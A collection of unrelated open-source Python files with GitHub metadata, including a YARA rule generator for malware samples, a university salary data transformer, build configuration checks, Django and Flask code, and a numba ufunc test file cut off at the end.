def buildYara(options, strings, hashes):
date = datetime.now().strftime("%Y-%m-%d")
randStrings = []
#Ensure we have shared attributes and select twenty
try:
for i in range(1,20):
randStrings.append(random.choice(strings))
except IndexError:
print '[!] No Common Attributes Found For All Samples, Please Be More Selective'
sys.exit(1)
#Prioritize based on specific filetype
if options.FileType == 'email':
for string in strings:
if "@" in string:
randStrings.append(string)
if "." in string:
randStrings.append(string)
#Remove Duplicates
randStrings = list(set(randStrings))
ruleOutFile = open(options.RuleName + ".yar", "w")
ruleOutFile.write("rule "+options.RuleName)
if options.Tags:
ruleOutFile.write(" : " + options.Tags)
ruleOutFile.write("\n")
ruleOutFile.write("{\n")
ruleOutFile.write("meta:\n")
ruleOutFile.write("\tauthor = \""+ options.Author + "\"\n")
ruleOutFile.write("\tdate = \""+ date +"\"\n")
ruleOutFile.write("\tdescription = \""+ options.Description + "\"\n")
for h in hashes:
ruleOutFile.write("\thash"+str(hashes.index(h))+" = \""+ h + "\"\n")
ruleOutFile.write("\tsample_filetype = \""+ options.FileType + "\"\n")
ruleOutFile.write("\tyaragenerator = \"https://github.com/Xen0ph0n/YaraGenerator\"\n")
ruleOutFile.write("strings:\n")
for s in randStrings:
if "\x00" in s:
ruleOutFile.write("\t$string"+str(randStrings.index(s))+" = \""+ s.replace("\\","\\\\").replace('"','\\"').replace("\x00","") +"\" wide\n")
else:
ruleOutFile.write("\t$string"+str(randStrings.index(s))+" = \""+ s.replace("\\","\\\\") +"\"\n")
ruleOutFile.write("condition:\n")
if options.FileType == 'email':
ruleOutFile.write("\t any of them\n")
else:
ruleOutFile.write("\t"+str(len(randStrings) - 1)+" of them\n")
ruleOutFile.write("}\n")
ruleOutFile.close()
return
#Per filetype execution paths
def unknownFile(fileDict):
#Unknown is the default and will mirror executable excepting the blacklist
for fhash, path in fileDict.iteritems():
fileDict[fhash] = getStrings(path)
finalStringList = findCommonStrings(fileDict, 'unknown')
return finalStringList
def exeFile(fileDict):
for fhash, path in fileDict.iteritems():
fileDict[fhash] = exeImportsFuncs(path, getStrings(path))
finalStringList = findCommonStrings(fileDict, 'exe')
return finalStringList
def pdfFile(fileDict):
for fhash, path in fileDict.iteritems():
fileDict[fhash] = getStrings(path)
finalStringList = findCommonStrings(fileDict, 'pdf')
return finalStringList
def emailFile(fileDict):
for fhash, path in fileDict.iteritems():
fileDict[fhash] = emailParse(path)
finalStringList = findCommonStrings(fileDict, 'email')
return finalStringList
def officeFile(fileDict):
for fhash, path in fileDict.iteritems():
fileDict[fhash] = getStrings(path)
finalStringList = findCommonStrings(fileDict, 'office')
return finalStringList
def jshtmlFile(fileDict):
for fhash, path in fileDict.iteritems():
fileDict[fhash] = getStrings(path)
finalStringList = findCommonStrings(fileDict, 'jshtml')
return finalStringList
#Main
def main():
filetypeoptions = ['unknown','exe','pdf','email','office','js-html']
opt = argparse.ArgumentParser(description="YaraGenerator")
opt.add_argument("InputDirectory", help="Path To Files To Create Yara Rule From")
opt.add_argument("-r", "--RuleName", required=True , help="Enter A Rule/Alert Name (No Spaces + Must Start with Letter)")
opt.add_argument("-a", "--Author", default="Anonymous", help="Enter Author Name")
opt.add_argument("-d", "--Description",default="No Description Provided",help="Provide a useful description of the Yara Rule")
opt.add_argument("-t", "--Tags",default="",help="Apply Tags to Yara Rule For Easy Reference (AlphaNumeric)")
opt.add_argument("-v", "--Verbose",default=False,action="store_true", help= "Print Finished Rule To Standard Out")
opt.add_argument("-f", "--FileType", required=True, default='unknown',choices=filetypeoptions, help= "Select Sample Set FileType choices are: "+', '.join(filetypeoptions), metavar="")
if len(sys.argv)<=3:
opt.print_help()
sys.exit(1)
options = opt.parse_args()
if " " in options.RuleName or not options.RuleName[0].isalpha():
print "[!] Rule Name Can Not Contain Spaces or Begin With A Non Alpha Character"
#Get Filenames and hashes
fileDict = getFiles(options.InputDirectory)
print "\n[+] Generating Yara Rule " + options.RuleName + " from files located in: " + options.InputDirectory
#Begin per-filetype processing paths
if options.FileType == 'exe':
finalStringList = exeFile(fileDict)
elif options.FileType == 'pdf':
finalStringList = pdfFile(fileDict)
elif options.FileType == 'email':
finalStringList = emailFile(fileDict)
elif options.FileType == 'office':
finalStringList = officeFile(fileDict)
elif options.FileType == 'js-html':
finalStringList = jshtmlFile(fileDict)
else:
finalStringList = unknownFile(fileDict)
#Build and Write Yara Rule
global hashList
buildYara(options, finalStringList, hashList)
print "\n[+] Yara Rule Generated: "+options.RuleName+".yar\n"
print " [+] Files Examined: " + str(hashList)
print " [+] Author Credited: " + options.Author
print " [+] Rule Description: " + options.Description
if options.Tags:
print " [+] Rule Tags: " + options.Tags +"\n"
if options.Verbose:
print "[+] Rule Below:\n"
with open(options.RuleName + ".yar", 'r') as donerule:
print donerule.read()
print "[+] YaraGenerator (C) 2013 Chris@xenosec.org https://github.com/Xen0ph0n/YaraGenerator"
if __name__ == "__main__":
main()
| {
"content_hash": "04cf095e11e81b384414120fe73b6109",
"timestamp": "",
"source": "github",
"line_count": 324,
"max_line_length": 193,
"avg_line_length": 38.26234567901235,
"alnum_prop": 0.6604017100911511,
"repo_name": "codexgigassys/codex-backend",
"id": "1ccb602ee5762da8fc2abdfe40ea352dc75a517d",
"size": "12617",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "yara/YaraGenerator/yaraGenerator.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "2944"
},
{
"name": "Python",
"bytes": "292728"
},
{
"name": "Shell",
"bytes": "664"
}
],
"symlink_target": ""
} |
from . import base
from . import mixins
from datetime import date
class TransformedRecord(
mixins.GenericCompensationMixin, mixins.GenericDepartmentMixin,
mixins.GenericIdentifierMixin, mixins.GenericJobTitleMixin,
mixins.GenericPersonMixin, mixins.MembershipMixin,
mixins.OrganizationMixin, mixins.PostMixin, mixins.RaceMixin,
mixins.LinkMixin, base.BaseTransformedRecord):
# REJECT_ALL_IF_INVALID_RECORD_EXISTS = False
MAP = {
'full_name': 'Name',
'department': 'Department Desc',
'job_title': 'Job Title',
'hire_date': 'Orig Hire Date',
'compensation': 'Annual Rt',
'employee_type': 'Full/Part',
'gender': 'Sex',
'nationality': 'Ethnic Grp',
'campus': 'Campus'
}
NAME_FIELDS = ('full_name', )
# The name of the organization this WILL SHOW UP ON THE SITE,
# so double check it!
# ORGANIZATION_NAME = 'University of Houston'
# What type of organization is this?
# This MUST match what we use on the site,
# double check against salaries.texastribune.org
ORGANIZATION_CLASSIFICATION = 'University'
# How do they track gender? We need to map what they use to `F` and `M`.
# gender_map = {'F': 'F', 'M': 'M'}
URL = ('https://s3.amazonaws.com/raw.texastribune.org/'
'university_houston/salaries/2019-03/campuses.xlsx')
race_map = {
'AMIND': 'American Indian',
'ASIAN': 'Asian',
'BLACK': 'Black',
'HISPA': 'Hispanic',
'NSPEC': 'Not Specified',
'WHITE': 'White',
'PACIF': 'Pacific Islander',
'NHISP': 'Not Hispanic',
'': 'Not Specified'
}
campus_map = {
'HR730': 'University of Houston',
'HR759': 'University of Houston-Clear Lake',
'HR765': 'University of Houston-Victoria',
'HR783': 'University of Houston System',
'HR784': 'University of Houston-Downtown',
}
DATE_PROVIDED = date(2019, 3, 2)
# Y/M/D agency provided the data
@property
def is_valid(self):
# Adjust to return False on invalid fields. For example:
return self.full_name.strip() != ''
@property
def organization(self):
r = {
'name': self.campus_map[self.campus.strip()],
'children': self.department_as_child,
'classification': self.ORGANIZATION_CLASSIFICATION,
}
return r
@property
def person(self):
name = self.get_name()
r = {
'family_name': name.last,
'given_name': name.first,
'additional_name': name.middle,
'name': unicode(name),
'gender': self.gender.strip()
}
return r
@property
def description(self):
employee_type = self.employee_type
if employee_type == 'F':
return "Annual salary"
if employee_type == 'P':
return "Part-time annual salary"
@property
def race(self):
return {
'name': self.race_map[self.nationality.strip()]
}
@property
def compensation_type(self):
employee_type = self.employee_type
if employee_type == 'F':
return 'FT'
if employee_type == 'P':
return 'PT'
@property
def department(self):
dept = self.get_mapped_value('department')
return dept
@property
def job_title(self):
job = self.get_mapped_value('job_title')
return job
transform = base.transform_factory(TransformedRecord)
| {
"content_hash": "e8fe0d82e3472e1420cbd2030a1c75db",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 76,
"avg_line_length": 26.696296296296296,
"alnum_prop": 0.5790788013318535,
"repo_name": "texastribune/tx_salaries",
"id": "7454b440ad42a46610d4397d5b1f507359900ad9",
"size": "3604",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tx_salaries/utils/transformers/university_of_houston.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "309280"
},
{
"name": "Ruby",
"bytes": "191"
}
],
"symlink_target": ""
} |
import unittest
from sklearn import datasets
class Test(unittest.TestCase):
def testIrisDataset(self):
iris = datasets.load_iris()
self.assertEqual(150,
len(iris.data),
"The dataset shall contain 150 instances")
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testIrisDataset']
unittest.main()
| {
"content_hash": "bbde33c427874089e90ee2cc3c5eb4fd",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 67,
"avg_line_length": 24.4375,
"alnum_prop": 0.578005115089514,
"repo_name": "sixninetynine/pygradle",
"id": "d098eff8fe5f0903b3a39e31c9e1cd8d29465d84",
"size": "391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/iris-classification/test/test_dataset.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Go",
"bytes": "216"
},
{
"name": "Groovy",
"bytes": "242974"
},
{
"name": "Java",
"bytes": "219226"
},
{
"name": "Python",
"bytes": "16278"
},
{
"name": "Shell",
"bytes": "203"
}
],
"symlink_target": ""
} |
"""
setup routine
"""
from setuptools import setup, find_packages
import os
def read(*paths):
"""Build a file path from *paths* and return the contents."""
with open(os.path.join(*paths), 'r') as open_file:
return open_file.read()
setup(
# Metadata
name='forseti',
version='0.8.1',
description='Formal Logic Framework',
long_description=read('README.rst'),
url='https://github.com/MasterOdin/forseti',
download_url='https://pypi.python.org/pypi/forseti',
license='MIT',
author='Matthew Peveler',
author_email='matt.peveler@gmail.com',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Operating System :: OS Independent',
'Topic :: Scientific/Engineering :: Mathematics',
],
# Contents
packages=find_packages(exclude=['tests*']),
)
| {
"content_hash": "89dfcedb6cf749f23856bc1953fbfc6f",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 65,
"avg_line_length": 27.930232558139537,
"alnum_prop": 0.6186511240632806,
"repo_name": "MasterOdin/forseti",
"id": "638ace8dee48cbcf4b8671f915c3fffd91dfc544",
"size": "1223",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "74093"
}
],
"symlink_target": ""
} |
import os
import smtplib
from email.mime.text import MIMEText
DEFAULT_SUBJECT_PREFIX = "[SEND] "
def send(fname, conf):
contents = open(fname).read()
msg = MIMEText(contents)
msg['Subject'] = DEFAULT_SUBJECT_PREFIX + os.path.basename(fname) + "..."
msg['From'] = conf['from']
msg['To'] = conf['to']
server = smtplib.SMTP(conf['server'])
server.ehlo()
server.starttls()
server.ehlo()
try:
server.login(conf['from'], conf['internal'])
server.sendmail(msg['From'], [msg['To']], msg.as_string())
except smtplib.SMTPAuthenticationError:
print "[ERROR] Email Authentication"
server.close()
| {
"content_hash": "f8c419d52995f216f26f62be2d19bcbd",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 77,
"avg_line_length": 29.90909090909091,
"alnum_prop": 0.6306990881458967,
"repo_name": "buckheroux/send",
"id": "d1decf695ee93b37feb032d251eae4f7c26695d7",
"size": "658",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "send/agent/semail.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3024"
}
],
"symlink_target": ""
} |
"""
Various configuration tests.
"""
from waflib import Task
from waflib.Configure import conf
from waflib.TaskGen import feature, before_method, after_method
import sys
LIB_CODE = '''
#ifdef _MSC_VER
#define testEXPORT __declspec(dllexport)
#else
#define testEXPORT
#endif
testEXPORT int lib_func(void) { return 9; }
'''
MAIN_CODE = '''
#ifdef _MSC_VER
#define testEXPORT __declspec(dllimport)
#else
#define testEXPORT
#endif
testEXPORT int lib_func(void);
int main(int argc, char **argv) {
(void)argc; (void)argv;
return !(lib_func() == 9);
}
'''
@feature('link_lib_test')
@before_method('process_source')
def link_lib_test_fun(self):
"""
The configuration test :py:func:`waflib.Tools.ccroot.run_c_code` declares a unique task generator,
so we need to create other task generators from here to check if the linker is able to link libraries.
"""
def write_test_file(task):
task.outputs[0].write(task.generator.code)
rpath = []
if getattr(self, 'add_rpath', False):
rpath = [self.bld.path.get_bld().abspath()]
mode = self.mode
m = '%s %s' % (mode, mode)
ex = self.test_exec and 'test_exec' or ''
bld = self.bld
bld(rule=write_test_file, target='test.' + mode, code=LIB_CODE)
bld(rule=write_test_file, target='main.' + mode, code=MAIN_CODE)
bld(features='%sshlib' % m, source='test.' + mode, target='test')
bld(features='%sprogram %s' % (m, ex), source='main.' + mode, target='app', use='test', rpath=rpath)
@conf
def check_library(self, mode=None, test_exec=True):
"""
Check if libraries can be linked with the current linker. Uses :py:func:`waflib.Tools.c_tests.link_lib_test_fun`.
:param mode: c or cxx or d
:type mode: string
"""
if not mode:
mode = 'c'
if self.env.CXX:
mode = 'cxx'
self.check(
compile_filename = [],
features = 'link_lib_test',
msg = 'Checking for libraries',
mode = mode,
test_exec = test_exec,
)
########################################################################################
INLINE_CODE = '''
typedef int foo_t;
static %s foo_t static_foo () {return 0; }
%s foo_t foo () {
return 0;
}
'''
INLINE_VALUES = ['inline', '__inline__', '__inline']
@conf
def check_inline(self, **kw):
"""
Check for the right value for inline macro.
Define INLINE_MACRO to 1 if the define is found.
If the inline macro is not 'inline', add a define to the ``config.h`` (#define inline __inline__)
:param define_name: define INLINE_MACRO by default to 1 if the macro is defined
:type define_name: string
:param features: by default *c* or *cxx* depending on the compiler present
:type features: list of string
"""
self.start_msg('Checking for inline')
if not 'define_name' in kw:
kw['define_name'] = 'INLINE_MACRO'
if not 'features' in kw:
if self.env.CXX:
kw['features'] = ['cxx']
else:
kw['features'] = ['c']
for x in INLINE_VALUES:
kw['fragment'] = INLINE_CODE % (x, x)
try:
self.check(**kw)
except self.errors.ConfigurationError:
continue
else:
self.end_msg(x)
if x != 'inline':
self.define('inline', x, quote=False)
return x
self.fatal('could not use inline functions')
########################################################################################
LARGE_FRAGMENT = '''#include <unistd.h>
int main(int argc, char **argv) {
(void)argc; (void)argv;
return !(sizeof(off_t) >= 8);
}
'''
@conf
def check_large_file(self, **kw):
"""
Check for large file support and define the macro HAVE_LARGEFILE
The test is skipped on win32 systems (DEST_BINFMT == pe).
:param define_name: define to set, by default *HAVE_LARGEFILE*
:type define_name: string
:param execute: execute the test (yes by default)
:type execute: bool
"""
if not 'define_name' in kw:
kw['define_name'] = 'HAVE_LARGEFILE'
if not 'execute' in kw:
kw['execute'] = True
if not 'features' in kw:
if self.env.CXX:
kw['features'] = ['cxx', 'cxxprogram']
else:
kw['features'] = ['c', 'cprogram']
kw['fragment'] = LARGE_FRAGMENT
kw['msg'] = 'Checking for large file support'
ret = True
try:
if self.env.DEST_BINFMT != 'pe':
ret = self.check(**kw)
except self.errors.ConfigurationError:
pass
else:
if ret:
return True
kw['msg'] = 'Checking for -D_FILE_OFFSET_BITS=64'
kw['defines'] = ['_FILE_OFFSET_BITS=64']
try:
ret = self.check(**kw)
except self.errors.ConfigurationError:
pass
else:
self.define('_FILE_OFFSET_BITS', 64)
return ret
self.fatal('There is no support for large files')
########################################################################################
ENDIAN_FRAGMENT = '''
short int ascii_mm[] = { 0x4249, 0x4765, 0x6E44, 0x6961, 0x6E53, 0x7953, 0 };
short int ascii_ii[] = { 0x694C, 0x5454, 0x656C, 0x6E45, 0x6944, 0x6E61, 0 };
int use_ascii (int i) {
return ascii_mm[i] + ascii_ii[i];
}
short int ebcdic_ii[] = { 0x89D3, 0xE3E3, 0x8593, 0x95C5, 0x89C4, 0x9581, 0 };
short int ebcdic_mm[] = { 0xC2C9, 0xC785, 0x95C4, 0x8981, 0x95E2, 0xA8E2, 0 };
int use_ebcdic (int i) {
return ebcdic_mm[i] + ebcdic_ii[i];
}
extern int foo;
'''
class grep_for_endianness(Task.Task):
color = 'PINK'
def run(self):
txt = self.inputs[0].read(flags='rb').decode('iso8859-1')
if txt.find('LiTTleEnDian') > -1:
self.generator.tmp.append('little')
elif txt.find('BIGenDianSyS') > -1:
self.generator.tmp.append('big')
else:
return -1
@feature('grep_for_endianness')
@after_method('process_source')
def grep_for_endianness_fun(self):
self.create_task('grep_for_endianness', self.compiled_tasks[0].outputs[0])
@conf
def check_endianness(self):
"""
Execute a configuration test to determine the endianness
"""
tmp = []
def check_msg(self):
return tmp[0]
self.check(fragment=ENDIAN_FRAGMENT, features='c grep_for_endianness', msg="Checking for endianness", define='ENDIANNESS', tmp=tmp, okmsg=check_msg)
return tmp[0]
| {
"content_hash": "1aecc2aa7e21edd2db9f2ace13d94cf7",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 149,
"avg_line_length": 26.16216216216216,
"alnum_prop": 0.6389462809917356,
"repo_name": "tommo/gii",
"id": "db1826fd5149f4b96308c860b81de0c60ab2e99f",
"size": "5875",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "support/waf/waflib/Tools/c_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "398"
},
{
"name": "C",
"bytes": "1118982"
},
{
"name": "C++",
"bytes": "743466"
},
{
"name": "CSS",
"bytes": "5956"
},
{
"name": "HTML",
"bytes": "126233"
},
{
"name": "JavaScript",
"bytes": "129855"
},
{
"name": "Lua",
"bytes": "1290198"
},
{
"name": "Makefile",
"bytes": "652"
},
{
"name": "Objective-C",
"bytes": "28896"
},
{
"name": "Objective-C++",
"bytes": "129214"
},
{
"name": "Python",
"bytes": "2676186"
},
{
"name": "Shell",
"bytes": "11215"
}
],
"symlink_target": ""
} |
"""Variance operator."""
import numpy
import numpoly
from .expected import E
def Var(poly, dist=None, **kws):
"""
The variance of a distribution or polynomial.
Args:
poly (numpoly.ndpoly, Distribution):
Input to take variance on.
dist (Distribution):
Defines the space the variance is taken on. It is ignored if
``poly`` is a distribution.
Returns:
(numpy.ndarray):
Element for element variance along ``poly``, where
``variation.shape == poly.shape``.
Examples:
>>> dist = chaospy.J(chaospy.Gamma(1, 1), chaospy.Normal(0, 2))
>>> chaospy.Var(dist)
array([1., 4.])
>>> q0, q1 = chaospy.variable(2)
>>> poly = chaospy.polynomial([1, q0, q1, 10*q0*q1])
>>> chaospy.Var(poly, dist)
array([ 0., 1., 4., 800.])
>>> chaospy.Var(2., dist)
array(0.)
"""
if dist is None:
dist, poly = poly, numpoly.variable(len(poly))
poly = numpoly.set_dimensions(poly, len(dist))
if poly.isconstant():
return numpy.zeros(poly.shape)
poly = poly - E(poly, dist, **kws)
poly = numpoly.square(poly)
return E(poly, dist, **kws)
| {
"content_hash": "7cf03513cc4447b58602698a51991ad5",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 72,
"avg_line_length": 28.651162790697676,
"alnum_prop": 0.5592532467532467,
"repo_name": "jonathf/chaospy",
"id": "55f24342565c78ee0fa639080f9af391788484f3",
"size": "1232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "chaospy/descriptives/variance.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "959784"
}
],
"symlink_target": ""
} |
from synergine.test.TestSuite import TestSuite as BaseTestSuite
from tests.simulation.TestSimulation import TestSimulation
from tests.core.connection.TestTerminal import TestTerminal
from tests.core.TestActionManager import TestActionManager
from tests.core.TestConfigurationManager import TestConfigurationManager
from tests.test.TestCycleCallback import TestCycleCallback
class TestSuite(BaseTestSuite):
def __init__(self):
super().__init__()
self.add_test_cases([TestConfigurationManager, TestActionManager, TestSimulation, TestTerminal,
TestCycleCallback])
| {
"content_hash": "157d9bddeadf3cdc828458c95ea23139",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 103,
"avg_line_length": 43.785714285714285,
"alnum_prop": 0.7862969004893964,
"repo_name": "buxx/synergine",
"id": "a5f8363a4933ff7a85c0d903fc674dbbe1520594",
"size": "613",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/TestSuite.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "85069"
}
],
"symlink_target": ""
} |
from smartshark.models import Job, Plugin, Project, PluginExecution
from smartshark.datacollection.pluginmanagementinterface import PluginManagementInterface
from django.core.management.base import BaseCommand
class Command(BaseCommand):
"""Fetch Logs for set of jobs and filter them for certain keywords."""
help = 'Filter job logs'
def add_arguments(self, parser):
parser.add_argument('plugin_name', type=str, help='Name of the plugin, Version can be used with = e.g., coastSHARK=1.03')
parser.add_argument('project_name', type=str)
parser.add_argument('filter_state', type=str, help='Select only Jobs with this state.')
parser.add_argument('filter_log_type', type=str, help='Log type (error, output).')
parser.add_argument('filter_string', type=str, help='String to filter in job logs.')
parser.add_argument('--execute', action='store_true', dest='execute', help='Really execute the operation.')
def handle(self, *args, **options):
tmp = options['plugin_name'].split('=')
if len(tmp) > 1:
plugin_name = tmp[0]
plugin_version = tmp[1]
plugin = Plugin.objects.get(name__icontains=plugin_name, version=plugin_version)
else:
plugin = Plugin.objects.get(name__icontains=options['plugin_name'])
project = Project.objects.get(name__icontains=options['project_name'])
pe = PluginExecution.objects.filter(plugin=plugin, project=project).order_by('submitted_at')[0]
self.stdout.write('looking in pluginexecution from: {}'.format(pe.submitted_at))
jobs = Job.objects.filter(plugin_execution=pe, status=options['filter_state'].upper())
if not options['execute']:
self.stdout.write('not executing, to execute operation run with --execute')
h = 'Searching for {} in {} logs of {} jobs with state {} for plugin {} on project {}'.format(options['filter_string'], options['filter_log_type'], len(jobs), options['filter_state'], plugin.name, project.name)
self.stdout.write(h)
interface = PluginManagementInterface.find_correct_plugin_manager()
if options['execute']:
found_revs = []
notfound_revs = []
for job in jobs:
output = []
if options['filter_log_type'] == 'error':
output = interface.get_error_log(job)
if options['filter_log_type'] == 'output':
output = interface.get_output_log(job)
if output:
output = '\n'.join(output)
if options['filter_string'] in output:
found_revs.append(job.revision_hash)
else:
notfound_revs.append(job.revision_hash)
self.stdout.write('String found in {} of {} jobs'.format(len(found_revs), len(jobs)))
if len(notfound_revs) < len(found_revs):
self.stdout.write('not found: {}'.format(','.join(notfound_revs)))
else:
self.stdout.write('found: {}'.format(','.join(found_revs)))
| {
"content_hash": "a087d12ae3a7bd96a53019db48c5d527",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 218,
"avg_line_length": 46.80597014925373,
"alnum_prop": 0.6128826530612245,
"repo_name": "smartshark/serverSHARK",
"id": "4b23bd73c7ee1c23abc16ba25d504588bf96e24f",
"size": "3183",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smartshark/management/commands/filter_job_logs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "66094"
},
{
"name": "HTML",
"bytes": "40562"
},
{
"name": "JavaScript",
"bytes": "1056"
},
{
"name": "Jinja",
"bytes": "4515"
},
{
"name": "Less",
"bytes": "78481"
},
{
"name": "Python",
"bytes": "267732"
},
{
"name": "Ruby",
"bytes": "5037"
},
{
"name": "SCSS",
"bytes": "79489"
}
],
"symlink_target": ""
} |
from flask import Blueprint, current_app, session, g, redirect, url_for
mod = Blueprint('home', __name__, url_prefix="/<lang_code>")
@mod.url_defaults
def add_language_code(endpoint, values):
if current_app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values['lang_code'] = session['lang_code']
g.lang_code = session['lang_code']
values.setdefault('lang_code', g.lang_code)
@mod.url_value_preprocessor
def pull_lang_code(endpoint, values):
session['lang_code'] = values.pop('lang_code')
g.lang_code = session.get('lang_code', None)
@mod.route('/change/<new_lang_code>')
def change(new_lang_code):
session['lang_code'] = new_lang_code
return redirect(url_for('home.index'))
| {
"content_hash": "bd955a23ac686bca00925af80abebc89",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 72,
"avg_line_length": 30.416666666666668,
"alnum_prop": 0.6753424657534246,
"repo_name": "nMustaki/flask-usul",
"id": "030da5d08416bd0233f3bea28cfdf61800bcffe5",
"size": "754",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/blueprints/home/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "453"
},
{
"name": "HTML",
"bytes": "8782"
},
{
"name": "JavaScript",
"bytes": "702"
},
{
"name": "Python",
"bytes": "14441"
}
],
"symlink_target": ""
} |
import os
from .base import *
DEBUG = False
## DATABASE SETTINGS
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.',
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
},
}
# IMPORTANT!:
# You must keep this secret, you can store it in an
# environment variable and set it with:
# export SECRET_KEY="phil-dunphy98!-bananas12"
# https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/#secret-key
SECRET_KEY = os.environ['SECRET_KEY']
## WSGI SETTINGS
# https://docs.djangoproject.com/en/1.8/ref/settings/#wsgi-application
WSGI_APPLICATION = 'recipe.wsgi.application'
## NOTIFICATIONS
# A tuple that lists people who get code error notifications.
# https://docs.djangoproject.com/en/1.8/ref/settings/#admins
ADMINS = (
('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
## DJANGO-COMPRESSOR SETTINGS
try:
from local_settings import *
except ImportError:
pass
| {
"content_hash": "bb5ee18fe9d2b46e949a3ffa8fa18b90",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 78,
"avg_line_length": 24.232558139534884,
"alnum_prop": 0.663147792706334,
"repo_name": "jajadinimueter/recipe",
"id": "c810758fbc79112ed837a89f296f76cd089aa90c",
"size": "1042",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipe/settings/production.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "164557"
},
{
"name": "HTML",
"bytes": "9722"
},
{
"name": "JavaScript",
"bytes": "80277"
},
{
"name": "Nginx",
"bytes": "4758"
},
{
"name": "Python",
"bytes": "50623"
},
{
"name": "XQuery",
"bytes": "1463"
}
],
"symlink_target": ""
} |
from __future__ import print_function, absolute_import, division
import sys
import numpy as np
from numba import config, unittest_support as unittest
from numba.npyufunc.ufuncbuilder import GUFuncBuilder
from numba import vectorize, guvectorize
from numba.npyufunc import PyUFunc_One
from numba.npyufunc.dufunc import DUFunc as UFuncBuilder
from ..support import tag, TestCase
def add(a, b):
"""An addition"""
return a + b
def equals(a, b):
return a == b
def mul(a, b):
"""A multiplication"""
return a * b
def guadd(a, b, c):
"""A generalized addition"""
x, y = c.shape
for i in range(x):
for j in range(y):
c[i, j] = a[i, j] + b[i, j]
@vectorize(nopython=True)
def inner(a, b):
return a + b
@vectorize(["int64(int64, int64)"], nopython=True)
def inner_explicit(a, b):
return a + b
def outer(a, b):
return inner(a, b)
def outer_explicit(a, b):
return inner_explicit(a, b)
class Dummy: pass
def guadd_obj(a, b, c):
Dummy() # to force object mode
x, y = c.shape
for i in range(x):
for j in range(y):
c[i, j] = a[i, j] + b[i, j]
def guadd_scalar_obj(a, b, c):
Dummy() # to force object mode
x, y = c.shape
for i in range(x):
for j in range(y):
c[i, j] = a[i, j] + b
class MyException(Exception):
pass
def guerror(a, b, c):
raise MyException
class TestUfuncBuilding(TestCase):
@tag('important')
def test_basic_ufunc(self):
ufb = UFuncBuilder(add)
cres = ufb.add("int32(int32, int32)")
self.assertFalse(cres.objectmode)
cres = ufb.add("int64(int64, int64)")
self.assertFalse(cres.objectmode)
ufunc = ufb.build_ufunc()
def check(a):
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
self.assertEqual(b.dtype, a.dtype)
a = np.arange(12, dtype='int32')
check(a)
# Non-contiguous dimension
a = a[::2]
check(a)
a = a.reshape((2, 3))
check(a)
# Metadata
self.assertEqual(ufunc.__name__, "add")
self.assertIn("An addition", ufunc.__doc__)
def test_ufunc_struct(self):
ufb = UFuncBuilder(add)
cres = ufb.add("complex64(complex64, complex64)")
self.assertFalse(cres.objectmode)
ufunc = ufb.build_ufunc()
def check(a):
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
self.assertEqual(b.dtype, a.dtype)
a = np.arange(12, dtype='complex64') + 1j
check(a)
# Non-contiguous dimension
a = a[::2]
check(a)
a = a.reshape((2, 3))
check(a)
def test_ufunc_forceobj(self):
ufb = UFuncBuilder(add, targetoptions={'forceobj': True})
cres = ufb.add("int32(int32, int32)")
self.assertTrue(cres.objectmode)
ufunc = ufb.build_ufunc()
a = np.arange(10, dtype='int32')
b = ufunc(a, a)
self.assertTrue(np.all(a + a == b))
def test_nested_call(self):
"""
Check nested call to an implicitly-typed ufunc.
"""
builder = UFuncBuilder(outer,
targetoptions={'nopython': True})
builder.add("(int64, int64)")
ufunc = builder.build_ufunc()
self.assertEqual(ufunc(-1, 3), 2)
def test_nested_call_explicit(self):
"""
Check nested call to an explicitly-typed ufunc.
"""
builder = UFuncBuilder(outer_explicit,
